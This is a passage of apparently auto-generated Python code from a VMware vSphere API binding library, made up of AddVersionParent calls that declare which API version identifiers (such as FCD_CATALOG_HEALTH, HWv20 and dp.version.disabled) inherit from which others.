AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version2")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version3")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.VM_CLONE_REKEY_TPM")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vmodl.query.version.version4")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vmodl.query.version.version3")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vmodl.query.version.version2")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vmodl.query.version.version1")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vmodl.version.version0")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vmodl.version.version1")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vmodl.version.version2")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.v6_9_1")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.v6_8_7")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version13")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version14")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version15")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version10")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version11")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version12")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.v7_0")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version8")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version9")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version6")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version7")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version1")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version4")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version5")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version2")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version3")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.FCD_CATALOG_HEALTH")
AddVersionParent("vim.version.smartnic_vc", "vmodl.query.version.version4")
AddVersionParent("vim.version.smartnic_vc", "vmodl.query.version.version3")
AddVersionParent("vim.version.smartnic_vc", "vmodl.query.version.version2")
AddVersionParent("vim.version.smartnic_vc", "vmodl.query.version.version1")
AddVersionParent("vim.version.smartnic_vc", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.smartnic_vc", "vmodl.version.version0")
AddVersionParent("vim.version.smartnic_vc", "vmodl.version.version1")
AddVersionParent("vim.version.smartnic_vc", "vmodl.version.version2")
AddVersionParent("vim.version.smartnic_vc", "vim.version.v6_9_1")
AddVersionParent("vim.version.smartnic_vc", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.smartnic_vc", "vim.version.v6_8_7")
AddVersionParent("vim.version.smartnic_vc", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.smartnic_vc", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.smartnic_vc", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.smartnic_vc", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.smartnic_vc", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.smartnic_vc", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version13")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version14")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version15")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version10")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version11")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version12")
AddVersionParent("vim.version.smartnic_vc", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.smartnic_vc", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.smartnic_vc", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.smartnic_vc", "vim.version.v7_0")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version8")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version9")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version6")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version7")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version1")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version4")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version5")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version2")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version3")
AddVersionParent("vim.version.smartnic_vc", "vim.version.smartnic_vc")
AddVersionParent("vim.version.HWv20", "vmodl.query.version.version4")
AddVersionParent("vim.version.HWv20", "vmodl.query.version.version3")
AddVersionParent("vim.version.HWv20", "vmodl.query.version.version2")
AddVersionParent("vim.version.HWv20", "vmodl.query.version.version1")
AddVersionParent("vim.version.HWv20", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.HWv20", "vmodl.version.version0")
AddVersionParent("vim.version.HWv20", "vmodl.version.version1")
AddVersionParent("vim.version.HWv20", "vmodl.version.version2")
AddVersionParent("vim.version.HWv20", "vim.version.v6_9_1")
AddVersionParent("vim.version.HWv20", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.HWv20", "vim.version.v6_8_7")
AddVersionParent("vim.version.HWv20", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.HWv20", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.HWv20", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.HWv20", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.HWv20", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.HWv20", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.HWv20", "vim.version.version13")
AddVersionParent("vim.version.HWv20", "vim.version.version14")
AddVersionParent("vim.version.HWv20", "vim.version.version15")
AddVersionParent("vim.version.HWv20", "vim.version.version10")
AddVersionParent("vim.version.HWv20", "vim.version.version11")
AddVersionParent("vim.version.HWv20", "vim.version.version12")
AddVersionParent("vim.version.HWv20", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.HWv20", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.HWv20", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.HWv20", "vim.version.v7_0")
AddVersionParent("vim.version.HWv20", "vim.version.version8")
AddVersionParent("vim.version.HWv20", "vim.version.version9")
AddVersionParent("vim.version.HWv20", "vim.version.version6")
AddVersionParent("vim.version.HWv20", "vim.version.version7")
AddVersionParent("vim.version.HWv20", "vim.version.version1")
AddVersionParent("vim.version.HWv20", "vim.version.version4")
AddVersionParent("vim.version.HWv20", "vim.version.version5")
AddVersionParent("vim.version.HWv20", "vim.version.version2")
AddVersionParent("vim.version.HWv20", "vim.version.version3")
AddVersionParent("vim.version.HWv20", "vim.version.HWv20")
AddVersionParent("vim.version.unstable", "vmodl.query.version.version4")
AddVersionParent("vim.version.unstable", "vmodl.query.version.version3")
AddVersionParent("vim.version.unstable", "vmodl.query.version.version2")
AddVersionParent("vim.version.unstable", "vmodl.query.version.version1")
AddVersionParent("vim.version.unstable", "vim.version.pcieHotPlugOfFPT")
AddVersionParent("vim.version.unstable", "vim.version.pr1429825")
AddVersionParent("vim.version.unstable", "vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT")
AddVersionParent("vim.version.unstable", "vim.version.MemoryTiering")
AddVersionParent("vim.version.unstable", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.unstable", "vim.version.FCD_VRA_SUPPORT")
AddVersionParent("vim.version.unstable", "vim.version.guestDetailedData")
AddVersionParent("vim.version.unstable", "vim.version.SGX_MPA_VMCheck")
AddVersionParent("vim.version.unstable", "vim.version.vdcs")
AddVersionParent("vim.version.unstable", "vmodl.version.version0")
AddVersionParent("vim.version.unstable", "vim.version.NFS_VMKPORTBIND")
AddVersionParent("vim.version.unstable", "vmodl.version.version1")
AddVersionParent("vim.version.unstable", "vmodl.version.version2")
AddVersionParent("vim.version.unstable", "vim.version.v6_9_1")
AddVersionParent("vim.version.unstable", "vim.version.VMC_NFS_SUPPORT")
AddVersionParent("vim.version.unstable", "vim.version.NsxLiveUpdate")
AddVersionParent("vim.version.unstable", "vim.version.VDS_ReadOnlyDisk")
AddVersionParent("vim.version.unstable", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.unstable", "vim.version.vVol_datastore_scalability")
AddVersionParent("vim.version.unstable", "vim.version.AssignHwCompositeDev")
AddVersionParent("vim.version.unstable", "vim.version.v6_8_7")
AddVersionParent("vim.version.unstable", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.unstable", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.unstable", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.unstable", "vim.version.VQAT")
AddVersionParent("vim.version.unstable", "vim.version.VCDP_NestedFilters")
AddVersionParent("vim.version.unstable", "vim.version.nativeSnapshot")
AddVersionParent("vim.version.unstable", "vim.version.hostProfiles")
AddVersionParent("vim.version.unstable", "vim.version.GraphicsDRS")
AddVersionParent("vim.version.unstable", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.unstable", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.unstable", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.unstable", "vim.version.hwh")
AddVersionParent("vim.version.unstable", "vim.version.version13")
AddVersionParent("vim.version.unstable", "vim.version.version14")
AddVersionParent("vim.version.unstable", "vim.version.version15")
AddVersionParent("vim.version.unstable", "vim.version.VSAN2_Configure")
AddVersionParent("vim.version.unstable", "vim.version.DRS_LB_REASONCODE")
AddVersionParent("vim.version.unstable", "vim.version.gosCrashRemediation")
AddVersionParent("vim.version.unstable", "vim.version.VCSOF_173")
AddVersionParent("vim.version.unstable", "vim.version.pciSriovExtendedID")
AddVersionParent("vim.version.unstable", "vim.version.vmxnet3UPT")
AddVersionParent("vim.version.unstable", "vim.version.version10")
AddVersionParent("vim.version.unstable", "vim.version.version11")
AddVersionParent("vim.version.unstable", "vim.version.VMcrypt_IntegrityProtection")
AddVersionParent("vim.version.unstable", "vim.version.version12")
AddVersionParent("vim.version.unstable", "vim.version.pciDeviceExt")
AddVersionParent("vim.version.unstable", "vim.version.toolsOffHost")
AddVersionParent("vim.version.unstable", "vim.version.hostCertificateManagement")
AddVersionParent("vim.version.unstable", "vim.version.vmMisc")
AddVersionParent("vim.version.unstable", "vim.version.VLCM_QuickLaunchPreload")
AddVersionParent("vim.version.unstable", "vim.version.LSI2PVSCSI")
AddVersionParent("vim.version.unstable", "vim.version.ProvisioningEventRefresh")
AddVersionParent("vim.version.unstable", "vim.version.OVF_SINGLEDEPLOY_API")
AddVersionParent("vim.version.unstable", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.unstable", "vim.version.pr1803450")
AddVersionParent("vim.version.unstable", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.unstable", "vim.version.VMcrypt_OnlineVMEncryption")
AddVersionParent("vim.version.unstable", "vim.version.FT_VBS_SUPPORT")
AddVersionParent("vim.version.unstable", "vim.version.WCP_FaultDomains")
AddVersionParent("vim.version.unstable", "vim.version.dnd")
AddVersionParent("vim.version.unstable", "vim.version.optional_virtual_disks")
AddVersionParent("vim.version.unstable", "vim.version.hwh2_0")
AddVersionParent("vim.version.unstable", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.unstable", "vim.version.VM_OP_NOTIFICATION_TO_APP_V1")
AddVersionParent("vim.version.unstable", "vim.version.EventsOrdering")
AddVersionParent("vim.version.unstable", "vim.version.PMemV2")
AddVersionParent("vim.version.unstable", "vim.version.v7_0")
AddVersionParent("vim.version.unstable", "vim.version.FileLockInfo_GSS34")
AddVersionParent("vim.version.unstable", "vim.version.version8")
AddVersionParent("vim.version.unstable", "vim.version.version9")
AddVersionParent("vim.version.unstable", "vim.version.version6")
AddVersionParent("vim.version.unstable", "vim.version.version7")
AddVersionParent("vim.version.unstable", "vim.version.DiskGroupVMC")
AddVersionParent("vim.version.unstable", "vim.version.TrustAuthority_V4")
AddVersionParent("vim.version.unstable", "vim.version.version1")
AddVersionParent("vim.version.unstable", "vim.version.version4")
AddVersionParent("vim.version.unstable", "vim.version.version5")
AddVersionParent("vim.version.unstable", "vim.version.SRIOVValidNumVFs")
AddVersionParent("vim.version.unstable", "vim.version.version2")
AddVersionParent("vim.version.unstable", "vim.version.version3")
AddVersionParent("vim.version.unstable", "vim.version.NDU_VSPHERE_HA_INTEGRATION")
AddVersionParent("vim.version.unstable", "vim.version.VmxRebootPowerOff")
AddVersionParent("vim.version.unstable", "vim.version.ClusteredEsx_V1")
AddVersionParent("vim.version.unstable", "vim.version.fourKnStorageSupport")
AddVersionParent("vim.version.unstable", "vim.version.resetportstatistics")
AddVersionParent("vim.version.unstable", "vim.version.batchRenameSupport")
AddVersionParent("vim.version.unstable", "vim.version.VM_CLONE_SWITCH_HOST_EMM")
AddVersionParent("vim.version.unstable", "vim.version.SGX_MPA_HostReg")
AddVersionParent("vim.version.unstable", "vim.version.GreenMetrics")
AddVersionParent("vim.version.unstable", "vim.version.hostVendorSpecificStatus")
AddVersionParent("vim.version.unstable", "vim.version.VMcrypt_V4")
AddVersionParent("vim.version.unstable", "vim.version.hostAccessManager")
AddVersionParent("vim.version.unstable", "vim.version.ocmSupportedForReconfigure")
AddVersionParent("vim.version.unstable", "vim.version.VirtualTopo")
AddVersionParent("vim.version.unstable", "vim.version.Tools_Update_Health")
AddVersionParent("vim.version.unstable", "vim.version.CPU_Scheduler_Info")
AddVersionParent("vim.version.unstable", "vim.version.VM_CLONE_REKEY_TPM")
AddVersionParent("vim.version.unstable", "vim.version.FCD_CATALOG_HEALTH")
AddVersionParent("vim.version.unstable", "vim.version.smartnic_vc")
AddVersionParent("vim.version.unstable", "vim.version.HWv20")
AddVersionParent("vim.version.unstable", "vim.version.unstable")
AddVersionParent("vim.version.unstable", "vim.version.FT_DRS_METRO_CLUSTER")
AddVersionParent("vim.version.unstable", "vim.version.VSAN_DeltaCompEnsureDurability")
AddVersionParent("vim.version.unstable", "vim.version.bmcInfo")
AddVersionParent("vim.version.unstable", "vim.version.vHT")
AddVersionParent("vim.version.unstable", "vim.version.ClusterConfigManagerV2")
AddVersionParent("vim.version.unstable", "vim.version.smartnic_network")
AddVersionParent("vim.version.unstable", "vim.version.DVX")
AddVersionParent("vim.version.unstable", "vim.version.VmcExternalStorageSupport")
AddVersionParent("vim.version.unstable", "vim.version.PodVMOnVDS")
AddVersionParent("vim.version.unstable", "vim.version.ClusterConfigManagerTransition")
AddVersionParent("vim.version.unstable", "vim.version.LiveUpdate")
AddVersionParent("vim.version.unstable", "vim.version.Vmfs_Unmap_Ultralow_Rate")
AddVersionParent("vim.version.unstable", "vim.version.VMcrypt3_KeyCustomAttribute")
AddVersionParent("vim.version.unstable", "vim.version.E2ENativeNVMeSupport")
AddVersionParent("vim.version.unstable", "vim.version.FCD_PERFORMANCE")
AddVersionParent("vim.version.unstable", "vim.version.SPBM_DISK_PROV_VIA_POLICY")
AddVersionParent("vim.version.unstable", "vim.version.nsx_uens_u2")
AddVersionParent("dp.version.disabled", "vmodl.query.version.version4")
AddVersionParent("dp.version.disabled", "vmodl.query.version.version3")
AddVersionParent("dp.version.disabled", "vmodl.query.version.version2")
AddVersionParent("dp.version.disabled", "vmodl.query.version.version1")
AddVersionParent("dp.version.disabled", "vim.version.pcieHotPlugOfFPT")
AddVersionParent("dp.version.disabled", "vim.version.pr1429825")
AddVersionParent("dp.version.disabled", "vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT")
AddVersionParent("dp.version.disabled", "dp.version.VSPHERE_DP_TELEMETRY")
AddVersionParent("dp.version.disabled", "vim.version.MemoryTiering")
AddVersionParent("dp.version.disabled", "vim.version.v7_0_1_1")
AddVersionParent("dp.version.disabled", "vim.version.FCD_VRA_SUPPORT")
AddVersionParent("dp.version.disabled", "vim.version.guestDetailedData")
AddVersionParent("dp.version.disabled", "vim.version.SGX_MPA_VMCheck")
AddVersionParent("dp.version.disabled", "vim.version.vdcs")
AddVersionParent("dp.version.disabled", "vmodl.version.version0")
AddVersionParent("dp.version.disabled", "vim.version.NFS_VMKPORTBIND")
AddVersionParent("dp.version.disabled", "vmodl.version.version1")
AddVersionParent("dp.version.disabled", "vmodl.version.version2")
AddVersionParent("dp.version.disabled", "dp.version.version1")
AddVersionParent("dp.version.disabled", "vim.version.v6_9_1")
AddVersionParent("dp.version.disabled", "vim.version.VMC_NFS_SUPPORT")
AddVersionParent("dp.version.disabled", "vim.version.NsxLiveUpdate")
AddVersionParent("dp.version.disabled", "vim.version.VDS_ReadOnlyDisk")
AddVersionParent("dp.version.disabled", "vim.version.v7_0_0_2")
AddVersionParent("dp.version.disabled", "vim.version.vVol_datastore_scalability")
AddVersionParent("dp.version.disabled", "vim.version.AssignHwCompositeDev")
AddVersionParent("dp.version.disabled", "vim.version.v6_8_7")
AddVersionParent("dp.version.disabled", "vmodl.reflect.version.version1")
AddVersionParent("dp.version.disabled", "vmodl.reflect.version.version2")
AddVersionParent("dp.version.disabled", "vim.version.v8_0_0_0")
AddVersionParent("dp.version.disabled", "vim.version.VQAT")
AddVersionParent("dp.version.disabled", "vim.version.VCDP_NestedFilters")
AddVersionParent("dp.version.disabled", "vim.version.nativeSnapshot")
AddVersionParent("dp.version.disabled", "vim.version.hostProfiles")
AddVersionParent("dp.version.disabled", "vim.version.GraphicsDRS")
AddVersionParent("dp.version.disabled", "vim.version.v7_0_3_1")
AddVersionParent("dp.version.disabled", "vim.version.v7_0_3_2")
AddVersionParent("dp.version.disabled", "vim.version.v7_0_3_0")
AddVersionParent("dp.version.disabled", "vim.version.hwh")
AddVersionParent("dp.version.disabled", "vim.version.version13")
AddVersionParent("dp.version.disabled", "vim.version.version14")
AddVersionParent("dp.version.disabled", "vim.version.version15")
AddVersionParent("dp.version.disabled", "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT")
AddVersionParent("dp.version.disabled", "vim.version.VSAN2_Configure")
AddVersionParent("dp.version.disabled", "vim.version.DRS_LB_REASONCODE")
AddVersionParent("dp.version.disabled", "vim.version.gosCrashRemediation")
AddVersionParent("dp.version.disabled", "vim.version.VCSOF_173")
AddVersionParent("dp.version.disabled", "vim.version.pciSriovExtendedID")
AddVersionParent("dp.version.disabled", "vim.version.vmxnet3UPT")
AddVersionParent("dp.version.disabled", "vim.version.version10")
AddVersionParent("dp.version.disabled", "vim.version.version11")
AddVersionParent("dp.version.disabled", "vim.version.VMcrypt_IntegrityProtection")
AddVersionParent("dp.version.disabled", "vim.version.version12")
AddVersionParent("dp.version.disabled", "vim.version.pciDeviceExt")
AddVersionParent("dp.version.disabled", "vim.version.toolsOffHost")
AddVersionParent("dp.version.disabled", "vim.version.hostCertificateManagement")
AddVersionParent("dp.version.disabled", "vim.version.vmMisc")
AddVersionParent("dp.version.disabled", "vim.version.VLCM_QuickLaunchPreload")
AddVersionParent("dp.version.disabled", "vim.version.LSI2PVSCSI")
AddVersionParent("dp.version.disabled", "vim.version.ProvisioningEventRefresh")
AddVersionParent("dp.version.disabled", "vim.version.OVF_SINGLEDEPLOY_API")
AddVersionParent("dp.version.disabled", "vim.version.v7_0_2_0")
AddVersionParent("dp.version.disabled", "vim.version.pr1803450")
AddVersionParent("dp.version.disabled", "vim.version.v7_0_2_1")
AddVersionParent("dp.version.disabled", "vim.version.VMcrypt_OnlineVMEncryption")
AddVersionParent("dp.version.disabled", "vim.version.FT_VBS_SUPPORT")
AddVersionParent("dp.version.disabled", "vim.version.WCP_FaultDomains")
AddVersionParent("dp.version.disabled", "vim.version.dnd")
AddVersionParent("dp.version.disabled", "vim.version.optional_virtual_disks")
AddVersionParent("dp.version.disabled", "vim.version.hwh2_0")
AddVersionParent("dp.version.disabled", "vim.version.v7_0_1_0")
AddVersionParent("dp.version.disabled", "vim.version.VM_OP_NOTIFICATION_TO_APP_V1")
AddVersionParent("dp.version.disabled", "vim.version.EventsOrdering")
AddVersionParent("dp.version.disabled", "vim.version.PMemV2")
AddVersionParent("dp.version.disabled", "vim.version.v7_0")
AddVersionParent("dp.version.disabled", "vim.version.FileLockInfo_GSS34")
AddVersionParent("dp.version.disabled", "vim.version.version8")
AddVersionParent("dp.version.disabled", "vim.version.version9")
AddVersionParent("dp.version.disabled", "vim.version.version6")
AddVersionParent("dp.version.disabled", "vim.version.version7")
AddVersionParent("dp.version.disabled", "vim.version.DiskGroupVMC")
AddVersionParent("dp.version.disabled", "vim.version.TrustAuthority_V4")
AddVersionParent("dp.version.disabled", "vim.version.version1")
AddVersionParent("dp.version.disabled", "vim.version.version4")
AddVersionParent("dp.version.disabled", "vim.version.version5")
AddVersionParent("dp.version.disabled", "vim.version.SRIOVValidNumVFs")
AddVersionParent("dp.version.disabled", "vim.version.version2")
AddVersionParent("dp.version.disabled", "vim.version.version3")
AddVersionParent("dp.version.disabled", "vim.version.NDU_VSPHERE_HA_INTEGRATION")
AddVersionParent("dp.version.disabled", "vim.version.VmxRebootPowerOff")
AddVersionParent("dp.version.disabled", "vim.version.ClusteredEsx_V1")
AddVersionParent("dp.version.disabled", "vim.version.fourKnStorageSupport")
AddVersionParent("dp.version.disabled", "vim.version.resetportstatistics")
AddVersionParent("dp.version.disabled", "vim.version.batchRenameSupport")
AddVersionParent("dp.version.disabled", "dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT")
AddVersionParent("dp.version.disabled", "vim.version.VM_CLONE_SWITCH_HOST_EMM")
AddVersionParent("dp.version.disabled", "dp.version.unstable")
AddVersionParent("dp.version.disabled", "vim.version.SGX_MPA_HostReg")
AddVersionParent("dp.version.disabled", "vim.version.GreenMetrics")
AddVersionParent("dp.version.disabled", "vim.version.hostVendorSpecificStatus")
AddVersionParent("dp.version.disabled", "vim.version.VMcrypt_V4")
AddVersionParent("dp.version.disabled", "vim.version.hostAccessManager")
AddVersionParent("dp.version.disabled", "vim.version.ocmSupportedForReconfigure")
AddVersionParent("dp.version.disabled", "dp.version.v8_0_0_0")
AddVersionParent("dp.version.disabled", "vim.version.VirtualTopo")
AddVersionParent("dp.version.disabled", "vim.version.Tools_Update_Health")
AddVersionParent("dp.version.disabled", "vim.version.CPU_Scheduler_Info")
AddVersionParent("dp.version.disabled", "vim.version.VM_CLONE_REKEY_TPM")
AddVersionParent("dp.version.disabled", "vim.version.FCD_CATALOG_HEALTH")
AddVersionParent("dp.version.disabled", "vim.version.smartnic_vc")
AddVersionParent("dp.version.disabled", "vim.version.HWv20")
AddVersionParent("dp.version.disabled", "vim.version.unstable")
AddVersionParent("dp.version.disabled", "dp.version.disabled")
AddVersionParent("dp.version.disabled", "vim.version.FT_DRS_METRO_CLUSTER")
AddVersionParent("dp.version.disabled", "vim.version.VSAN_DeltaCompEnsureDurability")
AddVersionParent("dp.version.disabled", "vim.version.bmcInfo")
AddVersionParent("dp.version.disabled", "vim.version.disabled")
AddVersionParent("dp.version.disabled", "vim.version.vHT")
AddVersionParent("dp.version.disabled", "vim.version.ClusterConfigManagerV2")
AddVersionParent("dp.version.disabled", "vim.version.smartnic_network")
AddVersionParent("dp.version.disabled", "vim.version.DVX")
AddVersionParent("dp.version.disabled", "vim.version.VmcExternalStorageSupport")
AddVersionParent("dp.version.disabled", "vim.version.PodVMOnVDS")
AddVersionParent("dp.version.disabled", "vim.version.ClusterConfigManagerTransition")
AddVersionParent("dp.version.disabled", "vim.version.LiveUpdate")
AddVersionParent("dp.version.disabled", "vim.version.Vmfs_Unmap_Ultralow_Rate")
AddVersionParent("dp.version.disabled", "vim.version.VMcrypt3_KeyCustomAttribute")
AddVersionParent("dp.version.disabled", "vim.version.E2ENativeNVMeSupport")
AddVersionParent("dp.version.disabled", "vim.version.FCD_PERFORMANCE")
AddVersionParent("dp.version.disabled", "vim.version.SPBM_DISK_PROV_VIA_POLICY")
AddVersionParent("dp.version.disabled", "vim.version.nsx_uens_u2")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vmodl.query.version.version4")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vmodl.query.version.version3")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vmodl.query.version.version2")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vmodl.query.version.version1")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vmodl.version.version0")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vmodl.version.version1")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vmodl.version.version2")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.v6_9_1")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.v6_8_7")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version13")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version14")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version15")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version10")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version11")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version12")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.v7_0")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version8")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version9")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version6")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version7")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version1")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version4")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version5")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version2")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.version3")
AddVersionParent("vim.version.FT_DRS_METRO_CLUSTER", "vim.version.FT_DRS_METRO_CLUSTER")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vmodl.query.version.version4")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vmodl.query.version.version3")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vmodl.query.version.version2")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vmodl.query.version.version1")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vmodl.version.version0")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vmodl.version.version1")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vmodl.version.version2")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.v6_9_1")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.v6_8_7")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VSAN_DeltaCompEnsureDurability", "vim.version.v8_0_0_0")
